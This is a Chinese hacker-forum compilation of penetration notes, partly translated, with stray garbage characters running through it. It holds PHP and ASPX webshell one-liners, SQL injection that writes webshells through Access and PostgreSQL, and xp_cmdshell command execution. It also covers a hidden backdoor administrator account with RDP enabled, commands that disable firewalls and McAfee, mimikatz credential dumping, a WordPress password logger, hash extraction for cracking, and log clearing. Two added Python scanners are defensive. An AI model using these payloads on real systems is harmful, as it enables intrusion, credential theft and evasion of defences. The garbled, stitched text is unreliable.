cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' e( C( K0 f9 E: q1 J9 A" V8 zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
6 O& j, n" _3 y' \ `5 E# V( E+ u( B
然后再重启服务器8 o+ _' i0 d6 q2 l2 H( V+ k
iisreset /reboot
0 c \+ H' P+ ]/ Q5 }这样就搞定了。。不过完事后。记得恢复权限。。。。
$ w- G. L0 C, \3 c8 U0 D! C/ T: qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
5 N+ a! D, n3 n( hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F, T! e" Y0 h$ {+ w, p8 g3 s u
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F0 [ }' b' b) @& K. j% \ g
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F, _% ?6 r; E6 \
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
' p0 P; L; V! l: {" f: y1 F9 T
& F0 E+ f' _( @' U' _' EEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
6 X; F8 u9 `5 j3 S2 f, A; {1 H" }0 ^7 c, b$ h
postgresql注射的一些东西$ m9 z0 | ^ X9 H6 b4 T$ c: e
如何获得webshell4 P/ M: _' |5 e5 u- m
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
. F2 z, K) j8 j0 B+ W7 Jhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
0 S2 V' b$ |; g, X, e4 a8 Rhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
" e# y+ E o) ^$ m如何读文件; m* \5 E: j- L; O8 w: @8 J
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
( `- G. t) r. U. G, Z$ b. m6 V, Jhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
: [/ E* X: P: z" zhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
4 V/ r' n8 E+ P3 G2 {2 W% _& n3 @& |7 u: f0 ?8 e
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。, M6 r, \- F8 I" u4 P7 M3 b2 R( ~
当然,这些的postgresql的数据库版本必须大于8.X( R" `7 P- D+ m7 U' |- S1 d
创建一个system的函数:
8 L. @2 f3 `% S# d( t0 \CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
$ Q+ E1 | Z( C
) h. ]9 u% J7 [创建一个输出表:
1 H' j" P1 |3 ~9 W8 E# FCREATE TABLE stdout(id serial, system_out text)2 @7 T! m8 Y5 H) m1 }8 I
( Z8 q* r7 K, g% K执行shell,输出到输出表内:; Z: i# l- @& L2 o( g
SELECT system('uname -a > /tmp/test')
. t3 B) W; u6 Q- m y p2 W5 b2 l% U/ L% e' P
copy 输出的内容到表里面;
3 B9 O* O* H9 q( |5 V+ a5 pCOPY stdout(system_out) FROM '/tmp/test'2 }$ A- V I+ z. I( h
" C. x, C' w$ @: \! }
从输出表内读取执行后的回显,判断是否执行成功
4 k/ \, P' P5 m. c3 m2 e- V0 K: r: r# E
SELECT system_out FROM stdout
6 x3 F I$ M( U% G# S1 Y5 d3 x! c下面是测试例子
3 ]) G" ^9 P) L4 b; b, B
1 A' w" \5 A/ v1 I1 L* L( u/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- : q2 x4 [; M& u2 e/ r: G
, j# e5 [0 a3 u! b* D( L4 `2 }! T
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'6 K# O6 N* e! c+ u Z- l
STRICT --
3 n5 O4 f5 R% J6 Y
" @9 \8 }6 `& P4 r. X/ U/store.php?id=1; SELECT system('uname -a > /tmp/test') --
, K! c& y: z$ h8 j
' B! A6 x6 z2 `1 p' `/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
0 G2 H4 `. `2 z/ Q5 m6 A
2 M' j( t- z( `1 w1 H/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
9 ]% W) o; Q }, M @9 tnet stop sharedaccess stop the default firewall* l# U$ n# F j4 c1 w# V" p3 c# ^! L
netsh firewall show show/config default firewall
' X! U) }5 P: C; m/ j& G( xnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
. X! J8 z) [' Z# jnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall9 r' q# u5 Y: q! u* y! Y: ~
修改3389端口方法(修改后不易被扫出)
7 \3 B* g- f( S5 B3 Y4 X5 a4 E% k( x修改服务器端的端口设置,注册表有2个地方需要修改
Z# m2 t6 q. c
& X8 P; K- E' d$ q[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]5 b% {) t7 e) \ I
PortNumber值,默认是3389,修改成所希望的端口,比如6000
- o! u! X- ?! e* \2 s. I6 ~4 p: ~1 w3 \& {$ F
第二个地方:
. A! p/ L/ w$ H[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 5 p0 [# J1 R( e P' \
PortNumber值,默认是3389,修改成所希望的端口,比如6000
. S7 v3 o% f! F+ y! t/ j
) b7 F7 }" m/ s, t- y6 ~3 n3 B现在这样就可以了。重启系统就可以了
. s3 @/ g8 F% i% }; Z J
3 H+ R. `3 ?2 T查看3389远程登录的脚本
, h" O7 Y4 M* [8 G保存为一个bat文件$ `6 x; o: q( c0 R' F) z
date /t >>D:\sec\TSlog\ts.log' h0 k+ b( U7 s: u6 q" m
time /t >>D:\sec\TSlog\ts.log
2 u" d5 a* g8 p4 V- U$ Knetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log8 s5 L% f0 s9 Q0 n/ z/ @3 d
start Explorer+ G* r0 h2 ^0 M8 [
) m! }2 J& Z! b8 emstsc的参数:
: a4 `6 S! I, h% {; O9 a! |( R/ l) k- U
远程桌面连接# C( y! [ F1 r+ b
* x& f1 r7 [: L" z* ~$ `
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
' j) h1 h: R. j [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?3 v; @, L ~- H8 b6 ?9 ]
3 O( b- }7 H# B
<Connection File> -- 指定连接的 .rdp 文件的名称。0 g% {8 x O* C% K, M2 I5 t
: _0 R/ p- r7 x8 U2 H
/v:<server[:port]> -- 指定要连接到的终端服务器。6 E8 Z( A6 A' p; D8 M
: r+ f4 B5 A# T U5 t2 A/console -- 连接到服务器的控制台会话。
5 X. I. _. p2 z
6 ~ W0 q3 ?& W/ W u/f -- 以全屏模式启动客户端。
7 s0 m7 W% \+ G& Y( h
$ X9 N; X3 X) _2 G; j/w:<width> -- 指定远程桌面屏幕的宽度。
' [4 i9 L' |& M8 a" K7 |0 p. j) k- {
/h:<height> -- 指定远程桌面屏幕的高度。
9 U( }( W( V( M1 r2 n# S) O
! f4 Z7 _7 \ W; @0 Y/edit -- 打开指定的 .rdp 文件来编辑。; C4 k7 J' @, A6 ^5 ?7 R d9 D
\8 X5 W* \; J1 v# V7 r
/migrate -- 将客户端连接管理器创建的旧版" v, }$ o0 B8 _6 I( d/ p
连接文件迁移到新的 .rdp 连接文件。5 X% ~9 V& ?: m! ~2 V+ k# }
3 m6 W1 N$ z+ W8 j9 W, F' w
( \ H, w, {. t& _其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
4 t) l1 d' c& B9 jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量8 e9 T) A- c9 X5 p1 A) h
' x) w3 j+ L g' A q7 d1 I0 K1 J命令行下开启3389
. ]$ f: P& ~! Q4 z" Snet user asp.net aspnet /add1 @0 [, [& d5 D8 e7 E9 u! u% A
net localgroup Administrators asp.net /add
3 L* ]/ b) _; |+ K; znet localgroup "Remote Desktop Users" asp.net /add6 X5 ?& Q9 m* h+ n f8 {4 Z+ k
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D& Z$ [, z: J8 x! O2 L9 @2 z; q
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0# H3 h' F3 L* n9 O- `: P
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
- E+ C8 n- h/ [8 G5 R' Mecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f1 `+ i: u* l1 B
sc config rasman start= auto
3 h, b" C5 B/ ?4 `' m; Nsc config remoteaccess start= auto d! N+ C* j/ t q' |" y6 r
net start rasman
) D: R/ P6 j6 P5 m% u" J5 q. gnet start remoteaccess
3 ]" K& p, f+ O; d8 B% }Media" v8 k& \* h1 f" j. C6 V: O n
<form id="frmUpload" enctype="multipart/form-data"
7 v4 _4 G+ \/ \; h5 n1 v' Taction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>( v% S; _0 H* v+ ? w _) j
<input type="file" name="NewFile" size="50"><br>$ e z! a: p4 V
<input id="btnUpload" type="submit" value="Upload">3 S; x8 k* v% A$ J- s! v
</form>$ e+ F0 e# H& @( ]8 E
; k0 b5 p, c0 ?" K4 W6 C
control userpasswords2 查看用户的密码
* l. r& m! c* uaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径2 }$ b$ q0 U; T B2 v5 X+ d( ?
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
/ T9 J2 q' }4 b( O5 r1 `
+ w& z" j" W9 e" X1 W1 g141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
# d2 l2 R3 Q4 f; j/ g测试1:
) U2 Y" U7 O0 M' R6 R: _6 vSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! v% {! B6 c) c% e1 t, ~) g
% m3 E) w# ~: `& G
测试2:$ e7 F9 B4 z" P8 ?9 D
* k& M0 S: R$ f6 r" Z0 Screate table dirs(paths varchar(100),paths1 varchar(100), id int)
- l* y8 j: C8 N, N k0 y L
' d. F9 M% C' T5 odelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--0 S$ v- O8 w, ?0 l; M
2 g& P. |# R/ t6 O: B
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t15 C, p8 `2 n. K- @/ j
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令! a7 L1 o# ^4 z# O/ ]; }5 O
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;1 J7 J2 Y& Z+ d; t( w U
net stop mcafeeframework1 c, p- K! f- s' C% d- H, h1 A
net stop mcshield0 z% U" `2 y2 e6 U& k- _" H- ~& D
net stop mcafeeengineservice- ]3 l, [7 R7 X9 J3 ?) s* x1 ]
net stop mctaskmanager7 R' [, W9 q! W
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
; L) B6 g+ U& A; o) `8 V J H; H- ] \" H+ K/ x/ K* d- d* U a7 R
VNCDump.zip (4.76 KB, 下载次数: 1) : W# N' ]; ^1 q
密码在线破解http://tools88.com/safe/vnc.php* G" j& d( c; _
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
exec master..xp_cmdshell 'net user'
Executing commands through MSSQL.

Query to retrieve the MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
Shrinking an MSSQL database.

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar, split into 200 MB volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to game.bak at D:\WebSites\game.com\UpFileList\game.bak
Discuz!NT 3.5 penetration notes:
(1) Visit siteurl/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open rss.aspx, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) One-liner backdoor URL: http://somesite.com.cn/tools/rss.aspx, password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively compresses website/
Note the path of rar.exe
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner trojan inserted where the input written to the file was not filtered.
Dumping the database when the web server and the database server are separate
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Restrictions meant a full shell could not be written, only a one-liner; that is actually enough to do anything, it is just not intuitive or convenient, e.g. for dumping the database.
What is used here is the shell client's expert mode (write your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect operating-system fingerprints
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identifies the name servers; gathers DNS information
host -l www.owasp.org ns1.secure.net   attempts a zone transfer for owasp.org
Netcraft DNS search service: http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (requires free registration)

MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x
DNSstuff: http://www.dnsstuff.com/ (several services available)

http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still private)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing into the database gives the error "Data too long for column 'username' at row 1"; the cause is that Chinese characters are not supported.
Changing a MySQL password
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner trojan backdoors

Many advanced PHP one-liner trojans turned up during intrusions. They are recorded here so they can be found and removed by keyword later.
1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include function: compiles and runs any file as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner

5. include ($uid);
// dangerous include function: compiles and runs any file as PHP; via POST

// one-liner embedded in a gif

6. Typical one-liners
Program backdoor code
<?php eval_r($_POST[sb])?>
Program code
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Program code
<?php assert($_POST[sb]);?>
// run the relevant PHP statements with the expert mode of lanker's one-liner client
Program code
<?$_POST['sa']($_POST['sb']);?>
Program code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Program code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, enter the following in the "config" field when setting up the connection in the Caidao one-liner client
Program code
<O>h=@eval_r($_POST[c]);</O>
Program code
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses a <? restriction
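The note above says these one-liners were recorded so they can be found by keyword later. Here is an added example (not from the original post) that does exactly that: a Python scanner whose regex signatures encode the idioms listed above (eval/assert of request input, a pattern literal with the /e modifier, request parameters called as functions, dynamic includes, function names assembled from single characters, the <script language="php"> tag and ${@eval()} interpolation) and reports which ones each file triggers; the signature names, the directory walker and the constructed sample snippets are ours.

```python
import os
import re

# Heuristic signatures for the one-liner idioms collected above. Names are
# ours (constructed for this example), not terms used by the original post.
SIGNATURES = [
    ("eval_of_request",
     re.compile(r"@?\beval\w*\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")),
    ("assert_of_request",
     re.compile(r"@?\bassert\s*\(\s*\$_(?:POST|GET|REQUEST)\b")),
    # pattern literal ending in /e, whether preg_replace is named or aliased ($hh)
    ("preg_replace_e_modifier", re.compile(r"/e['\"]\s*,")),
    # $_POST['sa']($_POST['sb']): request parameter used as the function name
    ("request_param_as_function",
     re.compile(r"\$_(?:POST|GET|REQUEST)\s*\[[^\]]+\]\s*\(")),
    # include of a variable (e.g. $filename taken from $_GET['xbid'])
    ("dynamic_include", re.compile(r"\binclude(?:_once)?\s*\(?\s*\$\w+")),
    # "p"."r"."e"."g"...: function name assembled from single characters
    ("char_concat_function_name",
     re.compile(r"(?:[\"'][a-z_][\"']\s*\.\s*){3,}[\"'][a-z_][\"']")),
    ("script_language_php_tag",
     re.compile(r"<script\s+language\s*=\s*[\"']php[\"']", re.I)),
    # "0${@eval(...)}": code execution hidden in string interpolation
    ("curly_brace_interpolated_eval", re.compile(r"\$\{\s*@?eval\b")),
]

def scan_php(source: str) -> list:
    """Return the sorted signature names that match one PHP source text."""
    return sorted(name for name, rx in SIGNATURES if rx.search(source))

def scan_tree(root: str, exts=(".php", ".phtml", ".inc")) -> dict:
    """Walk `root` and map each PHP file path to its (non-empty) findings."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed samples: the idioms listed above plus one benign snippet.
SAMPLES = {
    "concat_preg_e": '<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";'
                     ' $hh("/[discuz]/e",$_POST[\'h\'],"Access"); ?>',
    "assert": "<?php assert($_POST[sb]);?>",
    "var_func": "<?$_POST['sa']($_POST['sb']);?>",
    "script_tag": '<script language="php">@eval_r($_POST[sb])</script>',
    "curly_eval": '<?php $telok = "0${@eval($_POST[xxoo])}"; ?>',
    "dyn_include": "<?php $filename=$_GET['xbid']; include ($filename); ?>",
    "benign": "<?php $n = htmlspecialchars($_POST['name']); echo \"Hi $n\"; ?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:14s} -> {scan_php(src) or 'clean'}")
```

Run scan_tree("/path/to/webroot") to get a {file: [signatures]} report for a whole site; a hit is a candidate for manual review, not proof of compromise.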

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. widget is the password
7. Use exit to quit; do not close the window directly, otherwise the system will crash.

http://www.monyer.com/demo/monyerjs/ fairly comprehensive JS decoding site

Automatically check for high-risk system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
ASPX one-liner backdoor that gets past Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Log WordPress login passwords from a webshell to make further social engineering easier.
At line 539 of wp-login.php add:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login this password-logging code is triggered; you can of course also put the code in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it directly below; the logged passwords are written to pwd.txt.
Modifying wp-login.php is actually not a good approach, it is easily discovered; there are other methods, noted here for the record.
Bypassing Safedog with the IIS 6 file-parsing vulnerability:
;antian365.asp;antian365.jpg
Grabbing hashes from various database types to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL Server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins
MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+
Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'
Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql").
select usename, passwd from pg_shadow;
usename  | passwd
----------+-------------------------------------
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396
Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, I am a bit bored....
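As an added example (not from the original post), a Python audit helper that recognises each stored-hash layout described in this section by its shape alone, so that a review of dumped login tables can list which accounts still carry a legacy format; the function names, format labels and note strings are ours, and the sample hash values are the ones quoted above.

```python
import re

HEX = "[0-9A-Fa-f]"

# Format notes are ours, summarising the layouts described in this section.
NOTES = {
    "mssql2000": "0x0100 header, 4-byte salt, SHA-1 of the password, then SHA-1 of the "
                 "upper-cased password; the second hash is case-insensitive",
    "mssql2005": "0x0100 header, 4-byte salt, single SHA-1 of the password",
    "mysql_pre41": "legacy 16-hex-digit unsalted hash",
    "mysql_41": "'*' plus SHA1(SHA1(password)), unsalted",
    "postgres_md5": "'md5' plus md5(password + username); the only salt is the user name",
}
LEGACY = {"mssql2000", "mysql_pre41"}  # formats an audit should flag for rotation

def classify_db_hash(value: str) -> dict:
    """Recognise a stored database password hash by its layout.

    Returns {'format', 'salt', 'hashes', 'note'}; salt is None when the format
    has no random salt, and format is 'unknown' when nothing matches."""
    v = value.strip()
    # SQL Server 2000 and 2005 share the 0x0100 header and 4-byte salt; only
    # the 2000 format carries the second (upper-case) 20-byte hash.
    m = re.fullmatch(rf"0x0100({HEX}{{8}})({HEX}{{40}})({HEX}{{40}})?", v)
    if m:
        salt, h1, h2 = m.groups()
        fmt = "mssql2000" if h2 else "mssql2005"
        return {"format": fmt, "salt": salt,
                "hashes": [h for h in (h1, h2) if h], "note": NOTES[fmt]}
    if re.fullmatch(f"{HEX}{{16}}", v):
        return {"format": "mysql_pre41", "salt": None, "hashes": [v], "note": NOTES["mysql_pre41"]}
    m = re.fullmatch(rf"\*({HEX}{{40}})", v)
    if m:
        return {"format": "mysql_41", "salt": None, "hashes": [m.group(1)], "note": NOTES["mysql_41"]}
    m = re.fullmatch(f"md5({HEX}{{32}})", v)
    if m:
        return {"format": "postgres_md5", "salt": None, "hashes": [m.group(1)], "note": NOTES["postgres_md5"]}
    return {"format": "unknown", "salt": None, "hashes": [], "note": "unrecognised layout"}

def legacy_logins(rows) -> list:
    """From (login_name, stored_hash) pairs, return names stored in a legacy format."""
    return [name for name, h in rows if classify_db_hash(h)["format"] in LEGACY]

# Login names are constructed; hash values are the ones quoted in this section.
SAMPLE_ROWS = [
    ("sa_2000", "0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A"),
    ("sa_2005", "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"),
    ("mysql_old", "6f8c114b58f2ce9e"),
    ("mysql_new", "*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4"),
    ("testuser", "md5fabb6d7172aadfda4753bf0507ed4396"),
]

if __name__ == "__main__":
    for name, h in SAMPLE_ROWS:
        info = classify_db_hash(h)
        print(f"{name:10s} {info['format']:13s} salt={info['salt']} {info['note']}")
    print("legacy:", legacy_logins(SAMPLE_ROWS))
```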

Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing SQL Server 2008 logs; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete this file:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.
This post was last edited by simeon on 2013-1-3 09:51
Changing file permissions on Windows 2008
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu contains "Take ownership as administrator". If it does not:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the Win7 right-click "Take ownership as administrator" .reg file
II. Search C:\Windows for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui" files:
1. The "notepad.exe" in C:\Windows does not need replacing
2. The "notepad.exe" in C:\Windows\System32 does not need replacing
3. Ignore the four "notepad.exe.mui" files
